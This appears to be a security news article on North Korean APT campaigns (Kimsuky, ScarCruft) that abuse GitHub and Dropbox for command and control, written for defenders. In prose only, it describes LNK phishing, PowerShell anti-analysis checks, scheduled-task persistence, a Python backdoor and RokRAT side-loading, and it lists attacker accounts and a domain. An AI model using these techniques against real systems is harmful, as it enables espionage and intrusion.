North Korean state-linked threat actors are increasingly abusing legitimate cloud services such as GitHub and Dropbox as covert command-and-control (C2) channels, making their operations harder to detect and block. Recent investigations by Fortinet FortiGuard Labs, AhnLab and S2W highlight a series of campaigns targeting South Korean organizations that rely on LNK phishing, PowerShell scripts, Python backdoors and Hangul Word Processor (HWP) documents to gain and maintain access.
Cloud-based C2: a growing trend in North Korean APT operations
According to the research, at least two campaigns are attributed to the Kimsuky group, while a third is linked to the ScarCruft APT. All three operations share a common theme: abuse of trusted cloud platforms and “living off the land” binaries (LOLBins) such as PowerShell and Windows Task Scheduler instead of bulky, easily detectable malware.
This approach allows attackers to blend malicious traffic with normal user activity and to bypass traditional perimeter defenses that often whitelist popular services like GitHub and Dropbox. It also complicates incident response, as defenders must distinguish legitimate developer or file-sharing activity from hidden C2 communications.
Attack chain: LNK phishing, PowerShell and stealthy persistence
The first campaign described by Fortinet starts with a malicious Windows LNK file, likely delivered through spear-phishing emails. When the user opens the LNK shortcut, it simultaneously displays a decoy PDF document to appear legitimate and silently launches a PowerShell script in the background.
The PowerShell script immediately performs anti-analysis checks, scanning running processes for signs of virtual machines, debuggers or forensic tools. If such tools are detected, the script terminates to hinder malware analysis in sandboxed or laboratory environments.
If the checks pass, the script extracts a VBScript component and establishes persistence by creating a scheduled task that runs a hidden PowerShell payload every 30 minutes. This ensures long-term access even after system reboots while keeping visible artifacts to a minimum.
GitHub C2: masquerading as normal developer traffic
Once persistence is in place, the PowerShell malware profiles the compromised host, collecting system information, installed software details and environment data. The results are stored in a log file and uploaded to a GitHub repository controlled by an account named “motoralis”, using a hard-coded access token.
Researchers also identified related GitHub accounts such as “God0808RAMA”, “Pigresy80”, “entire73”, “pandora0009”, “brandonleeodd93-blip”, which appear to support the same infrastructure. The malware then reads a specific file in the repository to retrieve additional modules or instructions, effectively using GitHub as a remote control panel and data store.
Earlier iterations of this activity delivered the Xeno RAT family and its MoonPeak variant over GitHub, as documented by ENKI and Trellix, and were linked to Kimsuky. The current wave goes further by relying almost entirely on native Windows tools and scripts instead of custom executables, reducing the likelihood of detection by legacy antivirus solutions.
Dropbox-based C2 and Python backdoor in Kimsuky operations
A parallel Kimsuky campaign analyzed by AhnLab uses a similar LNK-based infection chain but switches to Dropbox as the C2 channel. The initial LNK launches a PowerShell script that creates a hidden directory “C:\windirr” and stores multiple payloads there, including a decoy PDF and a secondary LNK file pretending to be a Hangul Word Processor (HWP) document.
Additional intermediate components maintain persistence and invoke another PowerShell script that connects to Dropbox and downloads a batch (.BAT) file. This BAT script retrieves two parts of a ZIP archive from the domain “quickcon[.]store”, merges them, and extracts an XML Task Scheduler job along with a Python backdoor.
The scheduled task launches the Python implant, which supports a broad set of C2 commands: loading extra modules, executing shell commands, listing directories, uploading and downloading files, deleting data and running BAT, VBScript and EXE files. Such flexibility makes it a powerful tool for reconnaissance, lateral movement and long-term espionage inside victim networks.
ScarCruft evolves to HWP OLE droppers and RokRAT delivery
In a separate campaign, S2W observed the ScarCruft group moving away from classic LNK-based chains toward malicious OLE objects embedded in HWP documents. These documents deliver RokRAT, a remote access trojan believed to be used exclusively by ScarCruft.
The RokRAT payload is embedded as an OLE object and executed via DLL side-loading, a technique in which a legitimate application is tricked into loading a malicious DLL. Unlike older ScarCruft playbooks that relied on LNK files and BAT scripts to stage shellcode, the new method uses custom droppers and loaders to inject RokRAT more efficiently and stealthily, underscoring the continuous evolution of North Korean APT tooling.
Defence strategies: detecting abuse of GitHub, Dropbox and LOLBins
To counter these tactics, organizations should strengthen controls around script interpreters and built-in Windows utilities such as PowerShell, wscript and schtasks. Technologies like AppLocker or Windows Defender Application Control (WDAC), combined with centralized logging and analysis of PowerShell commands (including AMSI integration), can expose suspicious scripting activity early in the attack chain.
Security teams should treat LNK files in email and attachments masquerading as HWP or PDF documents as high-risk. File-type filtering, sandbox detonation of suspicious attachments and regular security awareness training on phishing techniques significantly reduce the success rate of initial compromise.
Equally important is monitoring endpoints’ access to cloud services such as GitHub and Dropbox outside of normal usage patterns. Proxy and DLP rules, detection of unusual access tokens or repositories, and routine review of newly created Scheduled Tasks and services can reveal attempts to turn legitimate SaaS platforms into covert C2 channels.
Given the clear trend of North Korean APT groups leveraging cloud platforms and native Windows tools for stealthy command and control, organizations should revisit their threat models and detection strategies with these vectors in mind. Prioritizing proactive detection, automated script analysis and continuous user education will be critical to maintaining resilience against these increasingly sophisticated, cloud-enabled targeted attacks.
